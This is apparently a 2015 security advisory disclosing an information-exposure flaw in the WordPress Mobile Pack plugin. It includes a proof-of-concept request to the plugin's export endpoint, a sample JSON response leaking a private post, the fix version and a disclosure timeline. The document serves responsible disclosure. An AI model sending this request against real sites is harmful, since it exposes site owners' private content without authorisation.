WordPress Mobile Pack 2.1.2 Information Disclosure
Posted on 20 July 2015
# Title: Information Exposure Vulnerability in WordPress Mobile Pack Wordpress Plugin v2.1.2 and below # Submitter: Nitin Venkatesh # Product: WordPress Mobile Pack Wordpress Plugin # Product URL: https://wordpress.org/plugins/wordpress-mobile-pack/ # Vulnerability Type: Information Exposure[CWE-200] # Affected Versions: v2.1.2 and below. Installed v2.1.3 before June 3, 2015 also affected. # Tested versions: v2.1.2, v2.1.3 (prior to June 3, 2015) # Fixed Version: v2.1.3 # Link to code diff: https://plugins.trac.wordpress.org/changeset/1173611/ # Changelog: https://wordpress.org/plugins/wordpress-mobile-pack/changelog/ # CVE Status: None/Unassigned/Fresh ## Product Information: The NEW WordPress Mobile Pack allows you to 'package' your existing content into a cross-platform mobile web application. ## Vulnerability Description: Information Disclosure - Returns the contents of a privately published post in JSON ## Proof of Concept: http://localhost/wp-content/plugins/wordpress-mobile-pack/export/content.php?content=exportarticle&callback=exportarticle&articleId=78 ### Sample HTTP Request GET /wp-content/plugins/wordpress-mobile-pack/export/content.php?content=exportarticle&callback=exportarticle&articleId=78 HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:38.0) Gecko/20100101 Firefox/38.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive ### Sample HTTP Response HTTP/1.1 200 OK Date: Wed, 03 Jun 2015 00:02:46 GMT Server: Apache/2.4.7 (Ubuntu) X-Powered-By: PHP/5.5.9-1ubuntu4.9 Content-Length: 462 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/json; charset=UTF-8 exportarticle({"article":{"id":78,"title":"Private Post!!!","timestamp":1432955820,"author":"admin","date":"Sat, May 30, 2015, 03:17","link":"http://localhost/?p=78","image":"","description":"<p>Should be invisible</p> ","content":"<p>Should be invisible</p> ","comment_status":"open","no_comments":0,"show_avatars":true,"require_name_email":true,"category_id":1,"category_name":"Uncategorized","related_posts":"","related_web_posts":"","zemanta":false}}) ## Solution: Upgrade to v2.1.3. Users who installed v2.1.3 before June 3, 2015 should re-download and re-install the package. ## Disclosure Timeline: 2015-06-01 - Discovered. Contacted developer on support forums. 2015-06-03 - Mailed report to developer. 2015-06-03 - Updated v2.1.3 released. 2015-07-18 - Publishing disclosure on FD mailing list. ## Disclaimer: This disclosure is purely meant for educational purposes. I will in no way be responsible as to how the information in this disclosure is used.